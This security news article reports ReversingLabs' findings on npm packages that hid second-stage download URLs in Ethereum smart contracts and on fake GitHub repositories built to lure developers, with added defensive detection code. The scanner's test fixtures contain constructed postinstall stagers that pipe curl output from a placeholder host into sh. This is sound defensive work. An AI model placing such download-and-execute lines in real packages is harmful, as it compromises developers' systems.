Researchers from ReversingLabs have discovered two malicious npm packages leveraging Ethereum smart contracts to conceal and deliver malware. The packages—colortoolsv2 and mimelib2—were identified in July 2025 and represent a new tactic in the ongoing battle over open source security.
The campaign began with the publication of colortoolsv2 on July 7. Shortly after its removal from npm, attackers replaced it with a nearly identical package named mimelib2, which contained the same malicious code. As the researchers explain, “the two npm packages abused smart contracts to conceal malicious commands that installed downloader malware on compromised systems.”
Both packages posed as utility libraries but shipped only the files needed for the attack; unlike legitimate npm tools, they offered no working functionality at all. The effort at looking legitimate went elsewhere: into GitHub repositories built to appear trustworthy.
Traditionally, malicious npm packages fetch second-stage malware from hardcoded URLs, making it possible for defenders to identify suspicious strings during source code review. However, ReversingLabs noted that “what is new and different is the use of Ethereum smart contracts to host the URLs where malicious commands are located downloading the second stage malware.”
Ethereum smart contracts, programs whose code and state live on the public blockchain and can be read by anyone through a node's RPC interface, were repurposed as a covert dead-drop for command-and-control (C2): the package reads the location of the next stage from contract state instead of carrying it in its own source. Neither a hosting provider nor a package registry can remove or edit that state, so the attacker's pointer to their infrastructure is far harder to take down than a conventional server or a hardcoded URL, and the lookup itself blends in with ordinary traffic to a public RPC endpoint.
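The two stager shapes described above can be told apart statically. The scanner below is an added example written for this page, not ReversingLabs' tooling and not code from the packages themselves; the package files it scans are constructed, the RPC endpoint, contract address and 203.0.113.10 host are placeholders, and the `getString` ABI and ethers calls in the second sample illustrate the pattern rather than reproduce the real packages.

```javascript
// Added example for this page (not ReversingLabs' code, not the packages' code):
// a static triage pass over an npm package's files that separates the two
// stager shapes: a hardcoded download URL, and a URL resolved from an Ethereum
// smart contract at install time. All package contents below are constructed.
const URL_RE = /https?:\/\/[^\s'"`)]+/g;
const ETH_ADDR_RE = /0x[0-9a-fA-F]{40}\b/g;
// Ethereum client libraries and RPC calls that no colour/MIME utility needs.
const CHAIN_RE = /require\(['"](ethers|web3|viem)['"]\)|\beth_call\b|JsonRpcProvider|getString\(/;
// Sinks that turn fetched content into execution.
const SINK_RE = /child_process|\bexec(Sync)?\(|\bspawn(Sync)?\(|\beval\(|new Function\(/;
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall'];

function scanPackage(files) {
  const findings = [];
  let pkg = {};
  try { pkg = JSON.parse(files['package.json'] || '{}'); } catch (e) { pkg = {}; }
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) findings.push({ type: 'install_hook', file: 'package.json', detail: `${hook}: ${scripts[hook]}` });
  }
  for (const [name, src] of Object.entries(files)) {
    if (name === 'package.json') continue;
    const urls = src.match(URL_RE) || [];
    const hasSink = SINK_RE.test(src);
    const usesChain = CHAIN_RE.test(src);
    if (hasSink && usesChain) {
      // No payload URL in the source: record what IS visible, the RPC endpoint
      // and the contract address, since those are the blockable indicators.
      const contracts = src.match(ETH_ADDR_RE) || [];
      findings.push({ type: 'onchain_url_stager', file: name,
        detail: `rpc=${urls.join(',') || 'n/a'} contract=${contracts.join(',') || 'n/a'}` });
    } else if (hasSink && urls.length) {
      findings.push({ type: 'hardcoded_url_stager', file: name, detail: urls.join(',') });
    }
  }
  return findings;
}

// Lifecycle hook plus a stager is the install-time execution chain; either
// alone still deserves a look in a package that claims to be a pure utility.
function verdict(findings) {
  const stager = findings.some(f => f.type.endsWith('_stager'));
  const hook = findings.some(f => f.type === 'install_hook');
  if (stager && hook) return 'block';
  if (stager || hook) return 'review';
  return 'clean';
}

// Constructed sample 1: the traditional stager, URL in plain sight
// (203.0.113.0/24 is a documentation range, not a real host).
const HARDCODED_PKG = {
  'package.json': JSON.stringify({ name: 'colortools-demo', version: '1.0.0',
    scripts: { postinstall: 'node index.js' } }),
  'index.js': [
    "const { execSync } = require('child_process');",
    "execSync('curl -fsSL http://203.0.113.10/stage2.sh | sh');",
  ].join('\n'),
};
// Constructed sample 2: the dead-drop variant. The only URL is an RPC endpoint;
// the download URL lives in contract storage and is fetched at install time.
const ONCHAIN_PKG = {
  'package.json': JSON.stringify({ name: 'colortools-demo', version: '1.0.1',
    dependencies: { ethers: '^6.0.0' }, scripts: { postinstall: 'node index.js' } }),
  'index.js': [
    "const { ethers } = require('ethers');",
    "const { exec } = require('child_process');",
    "const provider = new ethers.JsonRpcProvider('https://rpc.example.invalid');",
    "const abi = ['function getString() view returns (string)'];",
    "const c = new ethers.Contract('0x0000000000000000000000000000000000000000', abi, provider);",
    "c.getString().then(url => exec('curl -fsSL ' + url + ' | sh'));",
  ].join('\n'),
};
// Constructed sample 3: a real utility with no hooks, no sinks, no network.
const CLEAN_PKG = {
  'package.json': JSON.stringify({ name: 'colortools-demo', version: '2.0.0' }),
  'index.js': "module.exports = { rgb: (r, g, b) => 'rgb(' + [r, g, b].join(', ') + ')' };",
};

for (const [label, pkg] of [['hardcoded', HARDCODED_PKG], ['onchain', ONCHAIN_PKG], ['clean', CLEAN_PKG]]) {
  const f = scanPackage(pkg);
  console.log(label, verdict(f), JSON.stringify(f));
}
```

What the scanner makes concrete: in the on-chain variant the source carries no payload URL to grep for, only an RPC endpoint and a contract address, so a review that stops at "find the download URL" finds nothing. The dependable signal is the combination of an install-time lifecycle hook, an execution sink and a blockchain lookup, none of which a colour or MIME utility has any reason to contain.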
This method reflects a growing trend. As the report recalls, “back in 2023, we observed a similar pattern of behavior among Python packages that contained a Base64 encrypted URL pointing to a secret GitHub Gist designed to execute the download of malicious code.” Smart contracts represent the latest evolution of this tactic.
Beyond npm, the attackers invested significant resources into GitHub-based deception. For example, the solana-trading-bot-v2 repository appeared to be a popular cryptocurrency trading tool with thousands of commits, active contributors, and numerous stars. In reality, as the researchers found, “all of these details were fabricated.”
- Dozens of accounts, created around the same time in July, starred and forked the repository, yet most contained nothing more than a “Hi there” README file.
- The project’s thousands of commits consisted largely of trivial file changes, such as repetitive creation and deletion of LICENSE files, to simulate ongoing development.
- The user slunfuedrac was identified as the account responsible for adding colortoolsv2 and later mimelib2 into the project’s dependencies.
Other repositories like ethereum-mev-bot-v2, arbitrage-bot, and hyperliquid-trading-bot were also implicated, following the same pattern of fake activity to lure developers.
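The three fabrication signals the report lists (stargazer accounts created in one burst, stargazers that are empty shells, commit counts inflated by LICENSE churn) can be scored from data the GitHub API exposes. The code below is an added example for this page, not ReversingLabs' method; the records are constructed, their field names follow the GitHub REST user and commit objects, and both the "profile README only" heuristic (`public_repos <= 1`) and the 0.7 threshold are assumptions.

```javascript
// Added example for this page (not from the report): scoring the fabricated
// activity signals described above over constructed records shaped like
// GitHub REST API objects (user: login, created_at, public_repos;
// commit: sha, files[{filename, status}]).
const DAY_MS = 24 * 60 * 60 * 1000;

// Largest share of stargazer accounts whose creation dates fall inside one
// sliding window of `windowDays`. Organic stars come from accounts of all ages.
function stargazerBurst(stargazers, windowDays = 14) {
  const t = stargazers.map(s => Date.parse(s.created_at)).sort((a, b) => a - b);
  let best = 0;
  for (let i = 0, j = 0; i < t.length; i++) {
    while (t[i] - t[j] > windowDays * DAY_MS) j++;
    best = Math.max(best, i - j + 1);
  }
  return t.length ? best / t.length : 0;
}

// Share of stargazers that are shells: at most one public repo, which for a
// profile-README-only account is the repo named after the user (assumption).
function shellAccountRatio(stargazers) {
  const shells = stargazers.filter(s => s.public_repos <= 1).length;
  return stargazers.length ? shells / stargazers.length : 0;
}

// Share of commits that only add or delete LICENSE/README files, the churn
// pattern used to inflate the commit count.
function trivialCommitRatio(commits) {
  const trivial = commits.filter(c =>
    c.files.length > 0 && c.files.every(f =>
      /^(LICENSE|README)(\.\w+)?$/i.test(f.filename) && /^(added|removed)$/.test(f.status))
  ).length;
  return commits.length ? trivial / commits.length : 0;
}

function assessRepo({ stargazers, commits }, threshold = 0.7) {
  const burst = stargazerBurst(stargazers);
  const shells = shellAccountRatio(stargazers);
  const trivial = trivialCommitRatio(commits);
  const flags = [];
  if (burst >= threshold) flags.push('stargazers_created_in_burst');
  if (shells >= threshold) flags.push('stargazers_are_shell_accounts');
  if (trivial >= threshold) flags.push('commits_are_license_churn');
  const verdict = flags.length >= 2 ? 'likely_fabricated' : flags.length ? 'review' : 'no_signal';
  return { burst, shells, trivial, flags, verdict };
}

// Constructed sample: eight stargazers created within five days in July 2025
// with no real repos, two organic ones, and a commit history of LICENSE churn.
const user = (login, created_at, public_repos) => ({ login, created_at, public_repos });
const SAMPLE = {
  stargazers: [
    user('u01', '2025-07-05T10:00:00Z', 1), user('u02', '2025-07-05T11:30:00Z', 1),
    user('u03', '2025-07-06T09:15:00Z', 1), user('u04', '2025-07-06T14:00:00Z', 0),
    user('u05', '2025-07-07T08:00:00Z', 1), user('u06', '2025-07-07T19:45:00Z', 1),
    user('u07', '2025-07-08T07:00:00Z', 1), user('u08', '2025-07-09T12:00:00Z', 0),
    user('u09', '2019-03-12T00:00:00Z', 42), user('u10', '2021-11-02T00:00:00Z', 17),
  ],
  commits: [
    { sha: 'a1', files: [{ filename: 'LICENSE', status: 'added' }] },
    { sha: 'a2', files: [{ filename: 'LICENSE', status: 'removed' }] },
    { sha: 'a3', files: [{ filename: 'LICENSE', status: 'added' }] },
    { sha: 'a4', files: [{ filename: 'LICENSE', status: 'removed' }] },
    { sha: 'a5', files: [{ filename: 'README.md', status: 'added' }] },
    { sha: 'a6', files: [{ filename: 'src/bot.js', status: 'modified' }] },
  ],
};

console.log(JSON.stringify(assessRepo(SAMPLE)));
```

None of these ratios is conclusive on its own: a project that trends on social media also gets a burst of stars, and a repository that was just initialised has mostly trivial commits. Two or more signals together, on a repository that pulls in a freshly published dependency, is the combination worth acting on.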
By combining social engineering (fabricated GitHub credibility) with technical novelty (Ethereum smart contracts as the pointer to second-stage infrastructure), the attackers raise the bar for defenders. Developers relying on open source code cannot evaluate projects on superficial trust signals such as stars, forks, or commit counts; the dependency itself, including any install-time scripts, has to be read. ReversingLabs researchers warn, “it highlights the fast evolution of detection evasion strategies by malicious actors who are trolling open source repositories and developers.”